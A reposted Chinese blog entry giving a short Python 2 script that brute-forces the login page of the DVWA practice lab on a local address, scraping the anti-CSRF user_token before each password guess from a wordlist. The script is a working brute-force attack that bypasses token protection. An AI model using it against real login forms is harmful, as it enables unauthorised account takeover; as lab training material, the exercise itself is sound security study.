[转]获取user_token进行爆破的脚本

转自:http://www.freebuf.com/articles/web/116437.html

Paste_Image.png
from bs4 import BeautifulSoup
import urllib2
header={        'Host': '192.168.153.130',
        'Cache-Control': 'max-age=0',
        'If-None-Match': "307-52156c6a290c0",
        'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
        'Accept': '*/*',
        'Referer': 'http://192.168.153.130/dvwa/vulnerabilities/brute/index.php',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'zh-CN,zh;q=0.8',
        'Cookie': 'security=high; PHPSESSID=5re92j36t4f2k1gvnqdf958bi2'}
requrl = "http://192.168.153.130/dvwa/vulnerabilities/brute/"

def get_token(requrl,header):
    req = urllib2.Request(url=requrl,headers=header)
    response = urllib2.urlopen(req)
    print response.getcode(),
    the_page = response.read()
    print len(the_page)
    soup = BeautifulSoup(the_page,"html.parser")
    user_token = soup.form.input.input.input.input["value"] #get the user_token
    return user_token

user_token = get_token(requrl,header)
i=0
for line in open("rkolin.txt"):
    requrl = "http://192.168.153.130/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
    i = i+1
    print i,'admin',line.strip(),
    user_token = get_token(requrl,header)
    if (i == 10):
        break

其中重点在于使用
BeautifulSoup库,教程

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容